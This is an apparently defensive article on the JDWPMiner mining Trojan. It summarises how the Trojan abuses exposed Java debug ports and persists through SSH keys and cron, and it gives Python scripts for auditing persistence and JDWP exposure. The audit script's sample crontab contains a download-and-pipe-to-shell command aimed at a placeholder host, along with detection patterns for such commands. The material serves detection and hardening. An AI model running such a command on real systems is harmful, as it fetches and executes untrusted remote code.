
JDWPMiner Mining Trojan

The JDWPMiner Mining Trojan is a malware threat discovered by infosec researchers. It is part of a threatening attack campaign that targets installations exposing JDWP (Java Debug Wire Protocol), the protocol used for communication between a debugger and the Java Virtual Machine it debugs. The attackers exploit an RCE (Remote Code Execution) vulnerability to deliver a mining Trojan while also establishing control over the compromised system.

The Attack Chain

Because Java is a common component in the development of a wide range of applications, any vulnerability that is discovered could allow attackers to infect a significant number of potential victims. In JDWPMiner's case, the threat actor looks for installations where remote debugging has been left enabled and reachable. The cybercriminals abuse the Java Debug RCE to gain illicit access and then deliver mining binaries. The payloads are fetched from an unsafe source and used to set up a mining operation. The resources of the system, mainly the CPU, are then diverted towards mining a specific cryptocurrency. Naturally, this leaves fewer resources for the normal operations of the infected devices, leading to reduced output and potential losses.

In addition, the threat adds a key to the authorized_keys file, which gives it persistent remote access over SSH. It then executes four different methods to spawn a reverse shell and achieve total control over the host. Victims could then suffer data leaks, data loss, or other negative outcomes depending on the intentions of the attackers. The threat is also equipped with multiple persistence techniques: it uses crontab, cron.d, and rc.local to establish scheduled tasks or startup jobs.
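The persistence footprint described above (an added SSH key, cron entries, rc.local changes) is what an incident responder would audit on a suspected host. The following Python script is an added example, not code from the original article or from the researchers who analysed the threat; the file contents, the baseline of known keys and the flagged paths are constructed samples, and the heuristics (download-and-pipe-to-shell, executables launched from world-writable temp directories, SSH keys absent from a baseline) are general checks rather than indicators specific to JDWPMiner.

```python
import re
from typing import Dict, List, Set

# Constructed sample artifacts standing in for files read from a host under review.
SAMPLE_AUTHORIZED_KEYS = """\
# admin key provisioned by configuration management
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERADMINKEY admin@workstation
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPLACEHOLDERUNKNOWNKEY root@unknown
"""
# Baseline of key blobs the organisation expects on this host (constructed).
KNOWN_KEYS: Set[str] = {"AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERADMINKEY"}

SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -s http://example.invalid/x.sh | sh
"""
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
/tmp/.cache/worker &
exit 0
"""

# Heuristic 1: fetch a remote script and feed it straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
# Heuristic 2: launch something that lives in a world-writable temp directory.
TEMP_EXEC = re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/\S+")
# Field that starts the key itself; anything before it is an options field.
KEY_TYPE = re.compile(r"^(ssh-(rsa|ed25519|dss)|ecdsa-sha2-nistp\d+|sk-)")


def unknown_ssh_keys(authorized_keys: str, known: Set[str]) -> List[str]:
    """Return authorized_keys lines whose key blob is not in the baseline."""
    findings = []
    for line in authorized_keys.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # Skip leading option fields (e.g. command="...") until the key type.
        for i, field in enumerate(fields):
            if KEY_TYPE.match(field) and i + 1 < len(fields):
                if fields[i + 1] not in known:
                    findings.append(line)
                break
    return findings


def suspicious_lines(text: str) -> List[str]:
    """Return crontab/cron.d/rc.local lines matching either persistence heuristic."""
    return [
        line for line in text.splitlines()
        if FETCH_AND_RUN.search(line) or TEMP_EXEC.search(line)
    ]


def audit_persistence(authorized_keys: str, crontab: str, rc_local: str,
                      known: Set[str]) -> Dict[str, List[str]]:
    """Run all checks and group findings by the artifact they came from."""
    return {
        "authorized_keys": unknown_ssh_keys(authorized_keys, known),
        "crontab": suspicious_lines(crontab),
        "rc.local": suspicious_lines(rc_local),
    }


if __name__ == "__main__":
    for source, hits in audit_persistence(SAMPLE_AUTHORIZED_KEYS, SAMPLE_CRONTAB,
                                          SAMPLE_RC_LOCAL, KNOWN_KEYS).items():
        for hit in hits:
            print(f"[{source}] {hit}")
```

On a real host the same functions would be fed the contents of every user's `~/.ssh/authorized_keys`, the output of `crontab -l` for each user, the files under `/etc/cron.d`, and `/etc/rc.local`; a key that is not in the provisioning baseline is the finding most worth acting on, since it survives a reboot and a cleanup of the mining binaries.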

Mitigation

To prevent the JDWPMiner Trojan from infiltrating your system, you can take several easy-to-implement precautions. First, close the JDWP port, or at least make sure it is not reachable from the Internet. If you perform debugging in a staging environment, make sure you disable Debug mode after completing your tasks. Disabling Java Debug mode also removes the entry point the threat relies on.
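The quickest way to find a debug listener that was left enabled is to inspect the JVM command lines on each host for a `jdwp` agent and check which interface its `address` binds. The Python audit below is an added example, not code from the article; the process command lines are constructed samples, and the classification rests on two documented facts about the JDWP agent: `server=y` makes the JVM listen for a debugger, and an `address` with no host part binds every interface on JDK 8 and earlier but only loopback on JDK 9 and later, so a bare port is treated as exposed unless the JDK version is known.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed JVM command lines as they might appear in `ps -eo args` output.
SAMPLE_PROCESSES = [
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar app.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:5005 -jar dev.jar",
    "java -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar legacy.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=n,address=devbox:5005 -jar attach.jar",
    "java -jar prod.jar",
]

# Both the modern -agentlib:jdwp=... and the legacy -Xrunjdwp:... spellings.
JDWP_OPT = re.compile(r"-(?:agentlib:jdwp|Xrunjdwp)[=:](\S+)")
LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}


@dataclass
class Finding:
    cmdline: str
    address: str
    exposed: bool
    reason: str


def parse_jdwp_options(cmdline: str) -> Optional[dict]:
    """Return the agent's key=value options, or None if no JDWP agent is loaded."""
    match = JDWP_OPT.search(cmdline)
    if match is None:
        return None
    options = {}
    for item in match.group(1).split(","):
        key, _, value = item.partition("=")
        options[key] = value
    return options


def classify(cmdline: str) -> Optional[Finding]:
    """Decide whether a JVM's debug agent is reachable beyond the local host."""
    options = parse_jdwp_options(cmdline)
    if options is None:
        return None
    address = options.get("address", "")
    if options.get("server", "n") != "y":
        # server=n: the JVM connects out to a debugger and opens no listener.
        return Finding(cmdline, address, False, "client-mode agent, no listener")
    host, sep, _port = address.rpartition(":")
    if not sep:
        # Bare port: all interfaces on JDK 8 and earlier, loopback on JDK 9+.
        return Finding(cmdline, address, True,
                       "bare port; binds all interfaces on JDK 8 and earlier")
    if host in LOOPBACK:
        return Finding(cmdline, address, False, "bound to loopback")
    return Finding(cmdline, address, True,
                   f"listening on {host if host != '*' else 'all interfaces'}")


def audit(processes: List[str]) -> List[Finding]:
    """Classify every process that carries a JDWP agent."""
    return [f for f in map(classify, processes) if f is not None]


if __name__ == "__main__":
    for finding in audit(SAMPLE_PROCESSES):
        flag = "EXPOSED" if finding.exposed else "ok"
        print(f"{flag:8} address={finding.address or '-':18} {finding.reason}")
```

Anything reported as exposed should be restarted without the agent, or with `address=127.0.0.1:<port>` and an SSH tunnel when remote debugging is genuinely needed; the check complements, rather than replaces, a firewall rule that blocks the debug port from the Internet.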
